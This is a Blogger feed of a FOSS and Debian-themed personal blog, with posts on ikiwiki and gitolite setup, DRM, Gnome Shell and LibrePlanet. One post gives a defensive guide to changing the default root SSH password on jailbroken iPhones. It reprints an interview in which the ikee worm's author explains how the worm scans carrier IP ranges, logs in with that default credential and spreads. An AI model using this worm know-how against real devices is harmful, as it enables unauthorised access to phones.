tag:blogger.com,1999:blog-24548347136122253542012-01-30T15:52:11.114-08:00Femminismo - FOSS - The Debian Women Project | Against Apple, Micro$oft and DRMaliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comBlogger841100tag:blogger.com,1999:blog-2454834713612225354.post-68662888341771129782011-12-04T03:04:00.000-08:002011-12-04T03:05:05.047-08:00<div tabindex="0" class="B-u-ac B-u-nd-ja B-u B-u-bb" url="http://i.imgur.com/PpQaX.jpg" type="image/jpeg" style=""><img src="https://images1-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://i.imgur.com/PpQaX.jpg&amp;container=focus&amp;gadget=a&amp;rewriteMime=image/*&amp;refresh=31536000&amp;resize_h=120&amp;no_expand=1" style="display:block;" /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-6866288834177112978?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/03819404801092328004noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-32926480542117079622011-12-04T03:03:00.000-08:002011-12-04T03:04:35.077-08:00<div style="margin-top: 46px;" class="a-l-k"><img style="width: 640px; height: 420px;" src="https://lh6.googleusercontent.com/-Uh2vMlBOwek/TpiRSrX_5nI/AAAAAAAABak/fZ-XaB7yAGQ/s640/ARP.png" class="eq" /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-3292648054211707962?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/03819404801092328004noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-17098817244518380622011-06-26T13:14:00.000-07:002011-06-26T13:55:47.202-07:00<img style="width: 640px; height: 480px;" src="https://docs.google.com/drawings/pub?id=1-YZBgQx3iqiASMVXi1xGvFN7SoIV3HJhE4WcW7aJp14&amp;w=960&amp;h=720" /><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-1709881724451838062?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/03819404801092328004noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-67719620630122160982011-06-21T05:58:00.000-07:002011-06-25T11:44:37.779-07:00I had buy a RPS server from <a href="http://www.ovh.it/prodotti/offerte_rps.xml">ovh.it rps offers</a> but there isn't support for the server and the installable operating system is dated (lenny old stable). they have take ten days for activate my server so i have lost ten days for use my server (because is activated from 16-05-2011 but i had the possibility of use it since the 26-05-2011).<br />the RPS have a lots of problems and after the upgrade to squeeze i can't restart it for now because the iscisid version is too old and because you have to use ovh kernel for make it work and lot's of ovh parameter to set that i don't know.<br /><br />so i have upgraded to squeeze in the hope that in the future i get support on it.<br /><br />Ikiwiki + Gitolite<br /><br />after the squeeze dist-upgrade i had start to install ikiwiki + gitolite and apache2, i want to install ikiwiki because in the debian community many people is using it, and look like a nice and fully customizable wiki.<br />For first i had installed apache2 and i had also installed some dependencies to enable CGI in apache2 setup as: libcgi-formbuilder-perl and libcgi-session-perl.<br /><br />i want my site in the directory var/www/ikiwki/<br /><br />Then i have edited my /etc/apache2/apache2.conf and add a line like this:<br /><br />AddHandler cgi-script .cgi<br /><br />i have find the "Options" line for the directory where i've put the ikiwiki.cgi, and add "ExecCGI" to the list of options. in my example, ikiwiki.cgi was in /var/www/ikiwiki, i edited /etc/apache2/sites-enabled/000-default and i had add it to the "Options" line in the "Directory /var/www/ikiwiki". But if you've put it in a ~/public_html, edit /etc/apache2/mods-available/userdir.conf.<br /><br />i had also enabled the 404 plugin. <br />To make apache use it, the apache config file will need a further modification to make it use ikiwiki's CGI as the apache 404 handler. Something like this, with the path adjusted to where you've put the CGI:<br /><br />ErrorDocument 404 /cgi-bin/ikiwiki.cgi<br /><br />than i have installed gitolite following the root metod:<br /><br />On your workstation:<br />(remember that the ssh key don't ask for a password when you use it)<br /><br /> copy your ~/.ssh/id_rsa.pub file to /tmp/YourName.pub on the server<br /><br />On your server, as root:<br /><br />git clone git://github.com/sitaramc/gitolite<br />cd gitolite<br />src/gl-system-install<br /># defaults to being the same as:<br /># src/gl-system-install /usr/local/bin /usr/local/share/gitolite/conf /usr/local/share/gitolite/hooks<br /><br /># to upgrade gitolite, repeat the above commands. Make sure you use the<br /># same arguments for the last command each time.<br /><br /># create your "hosting user" if not already created with the user folder<br />useradd -m git<br /><br />su - git<br /><br /># (now as git)<br />gl-setup /tmp/YourName.pub<br /><br />and modify this file .gitolite.rc<br /><br />$REPO_UMASK = 0022; #(777 - 022 = 755; -rwxr-xr-x)<br /><br />On your workstation:<br /><br />git clone git@server:gitolite-admin<br /><br />you can also edit the .ssh/config file like this:<br /><br /><br />host gitolite<br /> user git<br /> hostname yourhostname<br /> port 22<br /> identityfile ~/.ssh/id_rsa<br /><br /><br />naturally you have to add the wiki repositories on gitolite<br />repo <wiki-name><br /> R = @all<br /> RW+ = admin<br /><br />now you have to make the directory /var/www/ikiwiki/<br />readable and writeable by git user:<br /><br />mkdir /var/www/ikiwiki<br />chgrp git /var/www/ikiwiki/<br />chmod 775 /var/www/ikiwiki/<br /><br /><br />ok now try to see if gitolite is working, if it is you can start installing ikiwiki:<br /><br />after have done apt-get install ikiwiki and installed the suggested package that you are insterested for use with the wiki i had modified the file in /etc/ikiwiki/auto.setup like this one:<br /><br /> #!/usr/bin/perl<br /> # Ikiwiki setup automator.<br /> #<br /> # This setup file causes ikiwiki to create a wiki, check it into revision<br /> # control, generate a setup file for the new wiki, and set everything up.<br /> #<br /> # Just run: ikiwiki -setup /etc/ikiwiki/auto.setup<br /> #<br /> # By default, it asks a few questions, and confines itself to the user's home<br /> # directory. You can edit it to change what it asks questions about, or to<br /> # modify the values to use site-specific settings.<br /> <br /> require IkiWiki::Setup::Automator;<br /> <br /> our $wikiname=IkiWiki::Setup::Automator::ask(<br /> gettext("What will the wiki be named?"), gettext("wiki"));<br /> our $wikiname_short=IkiWiki::Setup::Automator::sanitize_wikiname($wikiname);<br /> our $rcs=IkiWiki::Setup::Automator::ask(<br /> gettext("What revision control system to use?"), "git");<br /> our $admin=IkiWiki::Setup::Automator::ask(<br /> gettext("Which user (wiki account or openid) will be admin?"), $ENV{USER});<br /> use Net::Domain q{hostfqdn};<br /> our $domain=hostfqdn() || IkiWiki::Setup::Automator::ask(<br /> gettext("What is the domain name of the web server?"), "");<br /> <br /> IkiWiki::Setup::Automator->import(<br /> wikiname => $wikiname,<br /> adminuser => [$admin],<br /> rcs => $rcs,<br /> srcdir => "$ENV{HOME}/$wikiname_short",<br /> destdir => "/var/www/ikiwiki/",<br /> repository => "$ENV{HOME}/repositories/$wikiname_short.".($rcs eq "monotone" ? "mtn" : $rcs),<br /> dumpsetup => "$ENV{HOME}/$wikiname_short.setup",<br /> url => "http://$domain",<br /> cgiurl => "http://$domain/ikiwiki.cgi",<br /> cgi_wrapper => "/var/www/ikiwiki/ikiwiki.cgi",<br /> adminemail => "$ENV{USER}\@$domain",<br /> add_plugins => [qw{goodstuff websetup}],<br /> disable_plugins => [qw{}],<br /> libdir => "$ENV{HOME}/.ikiwiki",<br /> rss => 1,<br /> atom => 1,<br /> syslog => 1,<br /> )<br /><br />than i had done this <br /><br />su - git <br /><br />ikiwiki --setup /etc/ikiwiki/auto.setup<br /><br />and that's all!!!<br /><br />now you have ikiwiki + gitolite + apache<br /><br />i was almost for forgotten this is my wiki finished <a href="http://r36457.ovh.net/">http://r36457.ovh.net/</a><br /><br />for any problem please comment here↓<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-6771962063012216098?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/03819404801092328004noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-579573661854172892011-06-21T03:03:00.000-07:002011-06-21T03:45:43.169-07:00I'm the New Administrator with Gnutoo of the italian group of libreplanet, and we are tring to give update and news on the libreplanet project and free software, and is officiall approved by FSF<br /><br /><a href="https://libreplanetitalia.noblogs.org/">Libreplanet-it</a><br /><a href="http://libreplanet.org/wiki/Group:LibrePlanet_Italia">Libreplanet-it wiki</a><br /><br />you can find us also on irc #lp-it @ freenode<br /><br /><br /><br /><br /><img src="http://avatar.identi.ca/2091-96-20090920101326.png"><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-57957366185417289?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/03819404801092328004noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-77735209857007177572011-05-09T10:21:00.000-07:002011-05-09T10:24:55.756-07:00We are working on making a new interface for the women.debian.org website using <a href="http://ikiwiki.info">ikiwiki</a> and switching the repository from the old SVN to GIT!<br />yeah git rulez !!!<br /><br />here is the preview of the site <a href="http://alioth.debian.org/%7Ealiceinwire-guest/women/">women.debian.org </a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-7773520985700717757?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/03819404801092328004noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-79021751076012075522011-05-09T08:41:00.000-07:002011-05-09T09:02:36.729-07:00* New upstream maintenance release.<br />- debian/control.in:<br />- New Maintainer (closes: #620570)<br />- Added Homepage, thanks to jeansch.<br />- Bump Standards-Version to 3.9.1; no changes required.<br />debian/*.1<br />- Added nautilus-actions-print manpage; thanks to jeansch.<br />- Various fix.<br />debian/copyright<br />- Fixed GPL-2 path according to lintial warning the license used;<br />thanks to jeansch.<br />debian/nautilus-actions.dirs<br />- Removed, not used anymore; thanks to jeansch.<br /><br /><a href="http://svn.debian.org/wsvn/pkg-gnome/?op=comp&amp;">http://svn.debian.org/wsvn/pkg-gnome/?op=comp&amp;</a><br /><br />Last upstream here: http://www.nautilus-actions.org/downloads/<br /><br />This is my build string for svn-builpackage with cowdancer and pbuilder (based on <a href="http://upsilon.cc/%7Ezack/blog/posts/2007/09/svn-cowbuilder/">zack</a> command) using file from a remote repository without committing the local changes <span style="color: rgb(255, 0, 0);">but you need to add the new files!!</span><br />and it only build the package and test it with litian and don't add a new Debian changelog entry when done<br /><br />using: svn add<br /><br />alias svn-btc="svn-buildpackage --svn-builder='pdebuild --pbuilder cowbuilder --buildresult ..' --svn-lintian --svn-noautodch --svn-dont-clean --svn-ignore"<br /><br />write svn-btc for launch the command<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-7902175107601207552?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/03819404801092328004noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-31842521113074972002011-05-04T10:02:00.000-07:002011-05-09T07:37:41.687-07:00Today is the day against DRM (Digital Rights Management).<br /><br /><img src="http://imgs.xkcd.com/comics/content_protection.png" alt="The hidden truth under DRMs. From xkcd." title="The hidden truth under DRMs. From xkcd." height="255" width="400" /><br /><span style="font-size:85%;">© <a href="http://xkcd.com/129/">xkcd</a></span><br /><span style="font-size:85%;">This picture is licensed under a <a href="http://creativecommons.org/licenses/by-nc/2.5/">Creative Commons Attribution-NonCommercial 2.5 License</a>.</span><br /><br />Richard Stallman, President of the <a href="http://www.fsf.org/">Free Software Foundation</a>:<br /><cite>”The motive for DRM schemes is to increase profits for those who impose them, but their profit is a side issue when millions of people’s freedom is at stake; desire for profit, though not wrong in itself, cannot justify denying the public control over its technology. Defending freedom means thwarting DRM.”</cite><br /><br />I had buy my kindle DX and i think to have the right to use it in any possible way. formatting it or installing a different kernel but DRM give me no freedom on most stuff that i buy and sometime is also absurd like in Italy for mass media device we have to pay a tax on it because in the future-use we can maybe install some copyrighted software or buy a computer and have to pay lot of money for a System Operator like Microsoft or Apple software that i never used, that's weird DRM is taking to power in every aspect of our lives, making you pay what is free for definition...<br />and not happy of this is also making the way that you have to contribute on your cause also if you are against it.<br />like lot of industries making not bad product but limited by DRM and with little other chose in different ways if you don't want the DRM and much more expensive...<br /><br /><br /><br /><br /><br /><br /><a href="http://libreplanet.org/wiki?title=Group:DefectiveByDesign/Day_Against_DRM_2011"> <img alt="Purple banner -- May 4th, 2011: Day Against DRM" src="http://static.fsf.org/nosvn/dbd/Dadrm2011-purple-horiz.png" width="150" /><br /></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-3184252111307497200?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/03819404801092328004noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-56172540137951416482010-04-16T03:55:00.000-07:002010-04-16T03:56:23.853-07:00<p>Gnome 3 will be released in September 2010 integrating a stable version of Gnome Shell (currently in active development)!!!</p> <p>The first noticeable change in GNOME Shell is that the two panels of GNOME 2 are replaced by a single black panel at the top of the screen</p> <p>The most important of the innovations seen in GNOME Shell is the Activities overview mode which dedicates a full screen to all the different ways in which the user can switch from doing one thing (an activity) to doing something else.</p> <p>Gnome Shell is a really cool innovation on Gnome. It provides core interface functions like switching to windows and launching applications. GNOME Shell takes advantage of the capabilities of modern graphics hardware and introduces innovative user interface concepts to provide a delightful and easy to use experience.</p> <p>Is really different from the previous Gnome Interface and it take a bit of time for have full controll of this new interface but you can also see lot of improvements !</p> <p><a href="http://live.gnome.org/GnomeShell/Screenshots" target="_blank">Gnome Shell screenshots</a></p> <p><a href="irc://irc.gnome.org/#gnome-shell">irc.gnome.org:#gnome-shell</a></p> <a href="http://twitter.com/gnomeshell">Twitter #gnomeshell</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-5617254013795141648?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-50974404628731122712010-03-21T03:36:00.000-07:002010-03-21T03:38:52.757-07:00<img style="width: 195px; height: 206px;" alt="http://www.wardriving.it/wp-content/uploads/wanted.jpg" src="http://www.wardriving.it/wp-content/uploads/wanted.jpg" /><br /><br />Cerco Wardriver per il <a href="http://www.wardriving.it/">Cat</a> a orvieto di luglio 2010 per formare un team<br />mandate le richieste a jingcomics (et) gmail.com<br /><br />http://www.wardriving.it/<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-5097440462873112271?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-89161598560638888312009-12-31T02:37:00.000-08:002009-12-31T02:57:09.183-08:00Sono stata un pò assente in questo periodo perchè mi sto impegnando in progetti che mi prendono molto tempo e che trovo fantastici...<br /><br />In questo periodo ho letto la trilogia millenium di Stieg Larsson, la storia è molto avvincente e i personaggi adorabili.<br />Un peccato che molte domande rimangano irrisolte per la morte dell'autore :( ;<br />ad esempio che combina la sorella di Lisbeth...<br /><br />Sto anche iniziando un altro libro La matematica del novecento di Odifreddi.<br /><br />Auguro a tutti un Buon Anno nuovo e vi lascio con una immagine fatta da <a href="http://www.flickr.com/photos/achamo/">Achamo</a><br /><br /><p class="Photo" style="position: relative;"> <span class="photo_container pc_l"><a href="http://www.flickr.com/photos/achamo/4227239859/" title="Penguin Company by achamo"><img src="http://farm3.static.flickr.com/2630/4227239859_ccd5125a77.jpg" alt="Penguin Company by achamo" class="pc_img" border="0" height="383" width="500" /></a></span> </p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-8916159856063888831?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-64992677244721007742009-11-13T10:30:00.000-08:002009-11-13T10:32:23.712-08:00<a href="http://code.google.com/p/exploitbin/">exploitbin code project</a><br /><br /><div id="wikicontent" style="padding: 0pt 3em 1.2em 0pt;"> <p>exploitbin is a pastebin with exploiting functionality and a collaboration open source platform for find exploit on internet<br /></p><p>is pretty new and need lot of help !!!<br /></p> </div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-6499267724472100774?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-7147800859262285662009-11-13T09:28:00.000-08:002009-11-13T10:16:06.103-08:00You have jailbroken your iphone for make it more configurable and you use ssh for uploading stuff and you have not changed your password ???<br /><br />Most internet site write the default password of the iphone ssh jailbroken ( alpine) this information can used from a malware or a bad user for take information and make in risk your iphone.<br /><br />In this day there is also a iphone virus<br /><br /><a href="http://is.gd/4Unwx">http://is.gd/4Unwx</a><br /><br />The virus is really simple it check ip and if find a iphone in the network it try to use default ssh password<br /><br />For secure your iphone is pretty simple<br /><br />For this guide, you are going to need MobileTerminal (download it from Cydia):<br /><ol><li>Open the MobileTerminal Application on your device:<br /><a onclick="javascript:pageTracker._trackPageview('/downloads/wp-content/uploads/2009/11/IMG_0383.png');" href="http://blog.alltechrelated.com/wp-content/uploads/2009/11/IMG_0383.png"><img class="alignnone size-full wp-image-6884" title="IMG_0383" src="http://blog.alltechrelated.com/wp-content/uploads/2009/11/IMG_0383.png" alt="IMG_0383" height="480" width="320" /></a></li><li>Type in ’su root’ and click enter:<br /><a onclick="javascript:pageTracker._trackPageview('/downloads/wp-content/uploads/2009/11/IMG_0387.png');" href="http://blog.alltechrelated.com/wp-content/uploads/2009/11/IMG_0387.png"><img class="alignnone size-full wp-image-6885" title="IMG_0387" src="http://blog.alltechrelated.com/wp-content/uploads/2009/11/IMG_0387.png" alt="IMG_0387" height="480" width="320" /></a></li><li>It will ask for the password so type in ‘alpine’ which is the default password:<br /><a onclick="javascript:pageTracker._trackPageview('/downloads/wp-content/uploads/2009/11/IMG_0388.png');" href="http://blog.alltechrelated.com/wp-content/uploads/2009/11/IMG_0388.png"><img class="alignnone size-full wp-image-6886" title="IMG_0388" src="http://blog.alltechrelated.com/wp-content/uploads/2009/11/IMG_0388.png" alt="IMG_0388" height="480" width="320" /></a></li><li>Type in ‘passwd’ and click enter:<br /><a onclick="javascript:pageTracker._trackPageview('/downloads/wp-content/uploads/2009/11/IMG_0389.png');" href="http://blog.alltechrelated.com/wp-content/uploads/2009/11/IMG_0389.png"><img class="alignnone size-full wp-image-6887" title="IMG_0389" src="http://blog.alltechrelated.com/wp-content/uploads/2009/11/IMG_0389.png" alt="IMG_0389" height="480" width="320" /></a></li><li>It will ask for a new password (more than 5 characters) so type it in:<br /><a onclick="javascript:pageTracker._trackPageview('/downloads/wp-content/uploads/2009/11/IMG_0390.png');" href="http://blog.alltechrelated.com/wp-content/uploads/2009/11/IMG_0390.png"><img class="alignnone size-full wp-image-6888" title="IMG_0390" src="http://blog.alltechrelated.com/wp-content/uploads/2009/11/IMG_0390.png" alt="IMG_0390" height="480" width="320" /></a></li><li>It wil ask your to retype the password:<br /><a onclick="javascript:pageTracker._trackPageview('/downloads/wp-content/uploads/2009/11/IMG_0391.png');" href="http://blog.alltechrelated.com/wp-content/uploads/2009/11/IMG_0391.png"><img class="alignnone size-full wp-image-6889" title="IMG_0391" src="http://blog.alltechrelated.com/wp-content/uploads/2009/11/IMG_0391.png" alt="IMG_0391" height="480" width="320" /></a></li></ol><br /><br /><br /><br />This is the interview with the creator:<br /><span style="font-family: Arial; font-size: small;"><span style="background-color: white; font-size: 13px;"><br />[09:02] <jd> Hi ikee :-) Thanks for joining me<br />[09:02] <ikee> nps<br />[09:03] <jd> Now, as you're well aware, you wrote a virus that is infecting many iPhones in Australia. I guess the real question to start with is why?<br />[09:04] <ikee> First i was curious to how far something like this would actually spread, i think what most people were unaware of is the fact it IS a worm and every phone that got infected with it was spreading it (I initially only infected 3 phones when I woke up i checked google and found out a fair few people were hit with it)<br />[09:05] <ikee> Secondly i was quite amazed by the number of people who didn't RTFM and change their default passwords.<br />[09:07] <jd> How far did you expect it to spread, exactly?<br />[09:08] <ikee> Well i didn't think that many people would have not changed their passwords I was expecting to see maybe 10~ or so people, at first I was not even going to add the replicate/worm code but it was a learning experience and i got a tad carried away :)<br />[09:11] <jd> Are you aware that it has even started to replicate itself overseas?<br />[09:13] <ikee> I heard a few stories about it, that would have been sheer luck, the code itself is set to firstly scan the 3G IP range the phone is on, then Optus/Vodafone/Telstra's IP Ranges (I think the reason Optus got hit so hard is because the other 2 are NAT'd) then a random 20 IP ranges. I'm guessing a few phones hit a range that another vulnerable phone was on.<br />[09:14] <ikee> (From another country)<br />[09:15] <jd> Well that was my next question: Why does it only seem to be hitting Optus here and Overseas (I was presuming from screenshots I've seen)... So you're saying the Optus network is more vulnerable due to it not using NAT?<br />[09:17] <ikee> I don't think it was an Optus fault (Being an Optus user I quite like the fact i can access my iPhone services from the outside world), I think it was mainly the fault of people being to lazy to change their passwords (It only takes a couple of seconds guys) and I hope this taught a few people that.<br />[09:18] <jd> So do you know exactly how many people are currently infected with the "ikee virus"?<br />[09:20] <ikee> I can only confirm how many my phone infected alone, which was 100+ phones. I think most of them fixed it (AND I'M HOPING THEY CHANGED THEIR PASSWORDS.)<br />[09:21] <jd> So your major defense seems to be that people left themselves vulnerable, Do you steal stuff from people's houses if they leave the backdoor open?<br />[09:24] <ikee> I'll answer your question with two questions, Have you ever used unprotected Wifi? and Technically I did not steal anything, have you ever littered on someone else's property? (Smokers will definitely associate ;))<br />[09:25] <jd> Ok, I suppose I can personally admit to both of them, but it seems alot more to me like vandalism than littering, which isn't something I would do<br />[09:27] <ikee> Personally I would class littering as vandalism (They definitely don't want your rubbish there). I admit I probably pissed of a few people, but it was all in good fun (well ok for me anyway)<br />[09:30] <jd> So that explains why you decided to use Rick Astley. In my research, I've been reading about a similar virus (it seems) that contains a picture of an 'asian child' - I havn't seen screenshots of this, but that's how it is described. Are you also responsible for the "Asian Child virus"?<br />[09:32] <ikee> Ahh that was a quirk of my bad coding, the 'virus' itself has 4 variations and the first variation would resend its LockBackground.jpg to the victim. I did not comprehend that the infector might have not rebooted their phone after changing the LockBackground to something else (Causing them to send their changed lockbackground instead of Mr Astley)<br />[09:36] <jd> So it's the same virus, but now containing a picture of someone's loved one?<br />[09:37] <ikee> Yeah, that was definitely not the intended effect.<br />[09:39] <jd> Are you aware of the possible legal consequences of this (the ikee virus)? Are you concerned?<br />[09:40] <ikee> I'd like to think I'm aware, and also I highly doubt I'm in any real trouble (So no not concerned)<br />[09:43] <jd> James01 on Whirlpool asks: at least one person has reported being affected without a jailbreak – seems unlikely given the nature of the phone and what I have garned about the "virus" - is this possible, or are the reports unreliable/mistaken?<br />[09:44] <ikee> It only affects jailbroken phones, so people probably just got a little confused<br />[09:45] <jd> vanquish777 on Whirlpool says: What I want to know is, how did I get infected when I had SSH toggled off<br />[09:46] <ikee> You didn't :), My guess is you had it on and when the 'virus' hit, it disabled sshd so when you checked it afterwards it appeared to be off<br />[09:47] <jd> Which reminds me, many people have said they are no longer able to disable SSH, is this intended to make sure you can do more damage to users?<br />[09:50] <ikee> This was a hard bit for me to do, until i hit this the virus was not destructive at all. My first intention was to change the root/mobile password to random strings, then embed the strings into the LockBackground. Unfortunately passwd uses a tty (and not stdin) for its new password:request (similar to ssh logins, which is why you might find sshpass in /bin/, i had to port it) so to stop the phone getting infected over and over again (and<br />[09:50] <ikee> someone else catching on and having mischief with peoples phones) I removed SSHD (cydia reinstall will rememdy the problem)<br />[09:51] <ikee> (Cydia reinstall of SSH not reinstall Cydia itself)<br />[09:53] <jd> So you're saying that the only harm this virus causes is the removal of the SSH Daemon, which effectively, disables the initial problem?<br />[09:53] <ikee> Well that and the pretty background yes :)<br />[09:54] <jd> You mentioned that there are four versions/variants, what are the differences between them?<br />[09:55] <ikee> Variants A-C were quite similar and the ones most people have bought up. Variant D is fair bit different, it stores its files in a completely different place and hides itself a lot more (No random plists in LaunchDaemons)<br />[09:56] <jd> So you're saying that the newest variant is more hidden, is it more malicious?<br />[09:57] <ikee> It is a lot more hidden, a think most phones tend to be more secured now so it should die pretty fast. It is a little more malicious it tampers with some Cydia files.<br />[10:01] <jd> Do Android users risk being infected? I'm guessing that the virus would only log in as root:alpine (the default root username and password for the iPhone OS IIRC)<br />[10:02] <ikee> AFAIK no unless a user decided to use the same passwords, Although there is a weird quirk I read about dropbear in Android allowing any password (A bug with libcrypt I believe) but I could be very wrong.<br />[10:03] <ikee> But even if an android phone was attacked the platform differences would not allow the code to be run :)<br />[10:04] <jd> Just out of curiousity, what do you call what i've named the "ikee virus"?<br />[10:05] <ikee> Its in a folder called POC-iWorm (Proof Of Concept) but I never named it (ikee virus works!)<br />[10:09] <jd> You yesterday agreed to send me the source code (and removal instructions), what variant will it contain?<br />[10:10] <ikee> C/D whatever version you want :)<br />[10:11] <jd> How about all four? I'll obviously be placing them online - probably Google Code or similar<br />[10:13] <ikee> A-C was updated so I don't have the first 2, I forked D from C. (I don't know if its so wise posting the code online, nefarious people that otherwise would not have had the chance could modify it to be quite destructive)<br />[10:14] <jd> Perhaps, But it has become quite clear that there's a load of people that are unsecure, and if anyone wants to do anything bad enough, they are already going to know how.<br />[10:15] <jd> I guess i'm hoping that the jailbreak software will soon have a "enter new root password" prompt for those users that are un-aware.<br />[10:15] <ikee> I'll leave the choice up to you :)<br />[10:15] <ikee> I'd love to see that<br />[10:16] <ikee> or even a random password generated and displayed for the user to write down<br />[10:17] <jd> Yes, it would be very good. I had an iPod Touch a while ago, which I "jailbroke" - admittedly I didn't change the default password. I guess i'm just glad it's not me.<br />[10:17] <jd> Do you plan on making any further variants? If so, why?<br />[10:18] <ikee> No, I think the point has been made<br />[10:18] <jd> Have you developed anything PRODUCTIVE in the iPhone world?<br />[10:21] <ikee> I'm not too sure what others would class productive. I do not own a MAC or run OSX (Using a linux cross compile toolchain) so it makes it abit of a challenge to develop any applications utilising the UI (I have tho -.-). I think the best program ive developed for it for me was a remote debugging library that sends debug information over the network (Using MCAST)<br />[10:23] <jd> Do you have anything further to add (I'm having a mental blank on questions to ask right now)<br />[10:26] <ikee> I hope I did not piss off many people, this was a very simple problem and has an even simplier solution. I thought it was quite funny and I hope others did too :)<br />[10:27] <jd> You mentioned infecting only three iPhones to being with, when did that happen?<br />[10:28] <ikee> Around 4am November 6th (Yeah I have no life)<br />[10:31] <jd> To confirm, other than replicating itself, adding the picture of Rick Astley, and removing the SSH Daemon, are we likely to find anything else it does?<br />[10:32] <ikee> Nothing, and if you're releasing the source code people will be able to see that :)<br />[10:33] <jd> Can you please explain to me, how an infected user would remove the different versions correctly?<br />[10:33] <jd> by correctly, I mean completely.<br />[10:33] <ikee> Sure, variants A-C store files in these directories<br />[10:34] <ikee> /bin/poc-bbot<br />[10:34] <ikee> /bin/sshpass<br />[10:34] <ikee> /var/log/youcanbeclosertogod.jpg<br />[10:34] <ikee> /var/mobile/LockBackground.jpg<br />[10:35] <ikee> /System/Library/LaunchDaemons/com.ikey.bbot.plist<br />[10:35] <ikee> /var/lock/bbot.lock<br />[10:35] <ikee> using an rm (in SSH or mobile-terminal on those files will remove it)<br />[10:36] <ikee> then reboot the phone, change your password and reinstall SSH<br />[10:36] <ikee> For variant D its abit different<br />[10:36] <ikee> The locations are<br />[10:37] <ikee> /usr/libexec/cydia/startup<br />[10:37] <ikee> /usr/libexec/cydia/startup.so<br />[10:37] <ikee> /usr/libexec/cydia/startup-helper<br />[10:37] <ikee> /System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist<br />[10:38] <ikee> Of course cydia used these files previously so you may need to reinstall it after deleting this files<br />[10:38] <ikee> *these<br />[10:38] <jd> So the D variant overwrites system files?<br />[10:39] <ikee> Overwrits cydia's files<br />[10:39] <ikee> *Overwrites<br />[10:39] <jd> Sorry, I'm not an expert at the iPhone OS :P<br />[10:39] <ikee> Neither :P<br />[10:40] <jd> So none of your versions do contain any password changing commands?<br />[10:40] <jd> I mean, so when I provide uninstall instructions, I can tell them to use alpine as the password ?<br />[10:41] <ikee> None of the code changes passwords<br />[10:42] <jd> Thanks for your time ikee, and I really hope you do get into developing things that are productive sometime soon.<br />[10:42] <ikee> me too :) and no problems<br />[10:42] <jd> Perhaps on the Android platform (Yes, I know, I'm a fanboy)<br />[10:42] <ikee> I just downloaded the x86 iso, so maybe :P<br />[10:43] <jd> I'll ask you more about that after I end this logging session, Cheers :)<br />[10:43] <ikee> Ciaoo<br />End of #Interview_Room buffer Sun Nov 08 10:43:58 2009</span></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-714780085926228566?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-88833842167114897202009-11-13T03:36:00.000-08:002009-11-13T03:41:47.225-08:00Is open Votebox a application for choose what new feature have the priority on other in the Dropbox application!<br /><br />I'm a debian user and im really sad that dropbox is not in the debian repository because the dropbox images are copyrighted ...<br />so i have open a group for make dropbox completly open source and GPL for make it added in the debian repository<br /><a href="https://www.dropbox.com/votebox/196/dropbox-open-source"><br />Please vote here</a><br /><a href="https://www.dropbox.com/votebox/196/dropbox-open-source"><img alt="https://www.dropbox.com/static/1258095601/images/votebox.png" src="https://www.dropbox.com/static/1258095601/images/votebox.png" /></a><br /><br />*you have to loginin for vote!<div class="blogger-post-footer"><img width='1' height='1' 